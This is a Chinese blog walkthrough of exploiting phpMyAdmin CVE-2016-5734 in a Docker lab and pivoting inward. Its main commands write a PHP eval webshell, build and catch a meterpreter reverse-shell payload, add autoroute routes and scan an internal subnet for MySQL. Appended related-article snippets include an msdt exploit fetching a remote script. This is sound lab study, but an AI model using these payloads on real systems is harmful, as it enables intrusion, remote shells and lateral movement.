CVE-2016-5734远程代码执行模拟从外网进入内网

最新推荐文章于 2024-05-31 14:43:12 发布
最新推荐文章于 2024-05-31 14:43:12 发布
阅读量2k 收藏 2
点赞数
分类专栏: 其他漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nzjdsds/article/details/100142346
版权

【自己直接从自己的笔记中复制来的,若出现排版问题请直接查看原笔记】

文档:CVE-2016-5734远程代码执行模拟从外网?..
链接:http://note.youdao.com/noteshare?id=fbf75e67cc1573d01982bd923ac6c179&sub=8FB1C4FA3A1A4A45BD694D18C59391B8

 

前言

最近学习各种漏洞,然后学到了CVE-2016-5734漏洞

觉得挺有意思的,就想模拟做了下从外网到内网的过程,巩固下其他方面的知识

比较水就是想分享下自己的学习过程

漏洞原理

https://www.jianshu.com/p/8e44cb1b5b5b

环境搭建

项目地址:https://github.com/vulhub/vulhub

项目要用到Docker + Docker-Compose

安装过程网上很多

环境文件在

~/vulhub/phpmyadmin/CVE-2016-5734

开启环境

docker-compose -d

 

 

复现过程

 

访问下PHPmyadmin

账号密码默认都是root:root

在Kali中有自带的EXP

searchsploit phpmyadmin

通过EXP写入一句话木马

python3 40185.py -u root --pwd="root" http://192.168.56.111:8080/ -c "file_put_contents('shell.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbY21kXSk7Pz4='));"

-u:账号

-p:密码

-c:PHP代码

进入容器查看,一句话成功写入

用蚁剑连接

然后我们通过msfvenom生成木马

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.56.108 LPORT=2333 -f elf >/root/sa.elf

通过蚁剑把sa.elf上传到容器的/tmp环境下,/tmp环境是临时文件目录普通用户的权限都比较大

接下来在Kali上开启监听

msfconsole

msf5 > use multi/handler msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp  payload => linux/x64/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > set LHOST 192.168.56.108 LHOST => 192.168.56.108 msf5 exploit(multi/handler) > set LPORT 2333 LPORT => 2333

msf5 exploit(multi/handler) > run

然后在蚁剑的虚拟终端上运行木马

Kali上就得到会话

然后就是查询容器的网段地址,把容器的网段地址添加到路由中

meterpreter > run get_local_subnets 【获取内网段】

  [!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute. [!] Example: run post/multi/manage/autoroute OPTION=value [...] Local subnet: 172.18.0.0/255.255.0.0

meterpreter > run autoroute -s 172.18.0.0/24 【添加内网网段】 

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute. [!] Example: run post/multi/manage/autoroute OPTION=value [...] [*] Adding a route to 172.18.0.0/255.255.255.0... [+] Added route to 172.18.0.0/255.255.255.0 via 192.168.56.111 [*] Use the -p option to list all active routes

meterpreter > run autoroute -p  【打印路由信息】

  [!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute. [!] Example: run post/multi/manage/autoroute OPTION=value [...]  Active Routing Table ====================     Subnet             Netmask            Gateway    ------             -------            -------    172.18.0.0         255.255.255.0      Session 1

我们对MySQL进行探测

meterpreter > background  msf5 auxiliary(scanner/mysql/mysql_login) > use auxiliary/scanner/mysql/mysql_version  msf5 auxiliary(scanner/mysql/mysql_version) > set RhOSTS 172.18.0.1-254 RhOSTS => 172.18.0.1-254 msf5 auxiliary(scanner/mysql/mysql_version) > set THREADS 20 THREADS => 20 msf5 auxiliary(scanner/mysql/mysql_version) > run

进行校对结果是否正确

docker inspect b6 | grep IPAddress

然后可以对Mysql进行账号密码爆破

因为那个容器的密码为空 就不进行演示了

大方子
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 7
    评论
专栏目录
命令执行漏洞和CVE-2016-5734分析
willow_liang的博客
10-17 873
命令执行漏洞 背景 程序员使用脚本语言(比如PHP)开发应用程序过程中,脚本语言开发十分快速、简洁,方便,但是也伴随着一-些问题。比如说速度慢,或者无法接触系统底层,如果我们开发的应用,特别是企业级的一些应用需要去调用一-些外部程序。当应用需要调用- - -些外部程序时就会用到一-些执行系统命令的函数。 命令执行漏洞原理 命令执行漏洞(Command Execution)是指应用有时需要调用一些执行系统命令的函数,如: system()、 exec()、shell exec()、 eval()、 pass
Phpmyadmin后台代码执行CVE-2016-5734_poc
09-30
CVE-2016-5734在exploit-db上也就是 phpMyAdmin 4.6.2 - Authenticated Remote Code Execution ,意即phpMyAdmin认证用户的远程代码执行,根据描述可知受影响的phpMyAdmin所有的 4.6.x 版本(直至 4.6.3),4.4.x ...
buuctf [PHPMYADMIN]CVE-2016-5734
qq_1873822的博客
03-19 588
漏洞简介 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。在其查找并替换字符串功能中,将用户输入的信息拼接进preg_replace函数第一个参数中。 在PHP5.4.7以前,preg_replace的第一个参数可以利用\0进行截断,并将正则模式修改为e。众所周知,e模式的正则支持执行代码,此时将可构造一个任意代码执行漏洞。 以下版本受到影响: 4.0.10.16之前4.0.x版本 4.4.15.7之前4.4.x版本 4.6.3之前4.6.x版本(实际上由于该版本要求PHP5.5+,
CVE-2016-5734 phpmyadmin 远程代码执行漏洞
最新发布
xuxuxuxxxxx的博客
05-31 336
phpMyAdmin 是一个用PHP编写的软件工具,可以通过web方式控制和操作MySQL数据库。通过phpMyAdmin 可以完全对数据库进行操作,例如建立、复制和删除数据等等。phpMyAdmin在其查找并替换字符串功能中,将用户输入的信息拼接进 preg_replace 函数第一个参数中。在PHP5.4.7以前,preg_replace 的第一个参数可以利用\0进行截断,并将正则模式修改为e。众所周知,e模式的正则支持执行代码,此时将可构造一个任意代码执行漏洞。
phpmyadmin CVE-2016-5734
weixin_51692662的博客
11-03 240
phpmyadmin CVE-2016-5734
CVE-2016-5734 Phpmyadmin后台代码执行漏洞复现
凝聚力安全团队
01-24 2244
目录漏洞描述影响版本漏洞环境搭建漏洞分析漏洞利用漏洞加固参考链接 漏洞描述   CVE-2016-5734在exploit-db上也就是 phpMyAdmin 4.6.2 - Authenticated Remote Code Execution ,意即phpMyAdmin认证用户的远程代码执行,根据描述可知受影响的phpMyAdmin所有的 4.6.x 版本(直至 4.6.3),4.4.x 版本(直至 4.4.15.7),和 4.0.x 版本(直至 4.0.10.16)。 CVE的作者利用在php 5
vulhub-phpmyadmin中CVE-2016-5734
qq_26947429的博客
07-23 570
CVE-2016-5734远程代码执行漏洞 影响版的本phpmyadmin4.3.0-4.6.2 看到phpmyadmin登陆页面爆破拿到用户名密码root,root 利用poc进行命令执行 写入一句话进行菜刀连接 python27 CVE-2016-5734.py -u root -p "root" http://xx.xx.xx.xx:8080 -c "file_put_contents('shell.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbY21kX
CVE-2020-21224 ClusterEngineV4.0 远程代码执行.md
04-11
CVE-2020-21224 ClusterEngineV4.0 远程代码执行
CVE-2023-40477 WinRAR 远程代码执行漏洞 PoC
09-02
WinRAR 拥有超过 500 亿用户,面临新漏洞(CVE-2023-40477、CVE-2023-38831)。 今天,我们首次展示:CVE-2023-40477 的 PoC。 尽管 RCE 被认为是可利用的,但由于多种原因,其在实现过程中看起来并不乐观。 我们在...
CVE-2023-38831 WinRAR 远程代码执行漏洞 0Day PoC
08-25
CVE-2023-38831 漏洞位于ZIP文件的处理过程,攻击者可以制作恶意.ZIP或.RAR压缩文件,其中包含无害文件(例如.jpg、.txt或PDF文件等)及恶意执行文件,并以无害文件名为文件夹命名。当用户点击并试图解压缩看似合法...
[CVE-2016-5734]phpmyadmin(4.3.0-4.6.2)命令执行漏洞复现
https://www.cnblogs.com/zpchcbd/
08-30 655
触发原因:preg_replace函数引发的 触发原理:preg_replace漏洞触发有两个前提: 01:第一个参数需要e标识符,有了它可以执行第二个参数的命令 02:第一个参数需要在第三个参数中的中有匹配,不然echo会返回第三个参数而不执行命令,举个例子: 影响漏洞版本: 漏洞复现: 1、docker搭建 docker-compose up -d 2、漏洞利用代码:python php...
phpMyAdmin 4.0.x—4.6.2 远程代码执行漏洞(CVE-2016-5734
黑白的博客
12-29 593
声明 好好学习,天天向上 漏洞描述 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。在其查找并替换字符串功能中,将用户输入的信息拼接进preg_replace函数第一个参数中。 在PHP5.4.7以前,preg_replace的第一个参数可以利用\0进行截断,并将正则模式修改为e。众所周知,e模式的正则支持执行代码,此时将可构造一个任意代码执行漏洞。 影响范围 4.0.10.16之前4.0.x版本 4.4.15.7之前4.4.x版本 4.6.3之前4.6.x版本(实际上由于该版本要
CVE-2016-5734 phpmyadmin 远程命令执行漏洞
qq_41567985的博客
09-27 423
CVE-2016-5734在exploit-db上也就是phpMyAdmin 4.6.2 - Authenticated Remote Code Execution ,意即phpMyAdmin认证用户的远程代码执行,根据描述可知受影响的phpMyAdmin所有的4.6.x版本(直至4.6.3),4.4.x版本(直至4.4.15.7),和4.0.x版本(直至4.0.10.16)。CVE的作者利用在php5.4.7之前的版本中preg_replace函数对空字节的错误处理Bug,使注入的代码远程执行
【phpmyadmin漏洞复现】CVE-2016-5734远程代码执行漏洞+CVE-2018-12613文件包含漏洞+WooYun-2016-199433反序列化漏洞
serendipity1130的博客
09-01 870
CVE-2016-5734 1.访问8080端口,用弱口令root root登录 2. 在Kali中有自带的EXP: searchsploit phpmyadmin 3.进入该目录:/usr/share/exploitdb/exploits/php/webapps,通过EXP写入一句话木马: python3 40185.py -u root --pwd="root" http://192.168.225.139:8080/ -c "file_put_contents('shell.php'
cve-2016-9147
Yale的博客
04-11 793
0x01 漏洞描述: ISC BIND中的漏洞可能允许未经身份验证的远程攻击者在目标系统上导致拒绝服务(DoS)条件。 该漏洞是由于受影响的软件对用户提供的输入进行了不正确的验证。 攻击者可以通过向受影响的软件提交精心设计的查询响应来利用此漏洞。 成功利用可能允许攻击者使目标服务停止运行,从而导致目标系统出现DoS情况。 0x02 漏洞分析 当使用NSEC Record缓存DNS响应时,这个潜在的...
CVE-2016-0189
被遗弃的庸才博客
08-04 664
IE CVE-2016-0189远程执行漏洞分析 作者: 被遗弃的庸才 一、前言 IE CVE-2016-0189是通过Microsoft发布的MS16-051的补丁程序进行对比之后发现的,随后漏洞被韩国用于APT攻击。出现漏洞的原因是在vbs解析引擎中,数组中指定下标时会调用vbscript!AccessArray中的vbscript!rtVariantChangeTypeEx函数,vbscript!rtVariantChangeTypeEx函数并没有实现而是调用了oleaut32!VariantChan
CVE-2016-5734漏洞复现
qq_56426046的博客
09-11 470
在PHP5.4.7以前,preg_replace的第一个参数可以利用\0进行截断,并将正则模式修改为e。众所周知,e模式的正则支持执行代码,此时将可构造一个任意代码执行漏洞。
cve-2022-30190 msdt远程代码执行漏洞复现
09-10
CVE-2022-30190是一个针对Microsoft的漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞的复现过程。 首先,我们需要使用攻击者控制的远程服务器,以便在受影响的目标系统上执行恶意代码。我们创建以下PHP脚本,将其上传到我们的远程服务器上: ``` <?php system('calc.exe'); ?> ``` 这段代码将在目标系统上执行计算器应用程序,然后我们将通过"msdt.exe"命令行工具的特定参数利用该漏洞。 在受影响的目标系统上,我们将打开命令提示符,并执行以下命令: ``` msdt.exe "http://your-remote-server.com/evil-script.php" /id "netwoCpl" /showUI ``` 上述命令将启动"msdt.exe"并使用指定的URL作为参数,同时还指定了"networkCpl"作为"msdt.exe"的标识符。最后,使用"/showUI"参数显示用户界面。 当目标系统执行此命令时,"msdt.exe"会检索远程服务器上的脚本文件,并尝试执行该脚本。由于脚本文件具有恶意代码,它将在目标系统上执行计算器应用程序。 这就是CVE-2022-30190 msdt远程代码执行漏洞的一个简单复现过程。然而,值得注意的是,这只是为了说明该漏洞的原理,实际的攻击可能需要更复杂的技术和步骤。为了保护系统安全,我们建议及时更新受影响的软件,以修补此漏洞。还应该维护良好的网络安全措施,以减少被利用的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值